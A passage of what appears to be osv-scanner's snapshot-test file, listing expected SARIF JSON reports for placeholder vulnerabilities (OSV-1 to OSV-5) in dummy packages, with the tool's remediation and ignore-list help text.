ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.2' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.4.1' is vulnerable to 'OSV-3'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.4.1' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.2' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.4.1' is vulnerable to 'OSV-3'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.4.1' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/third/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, 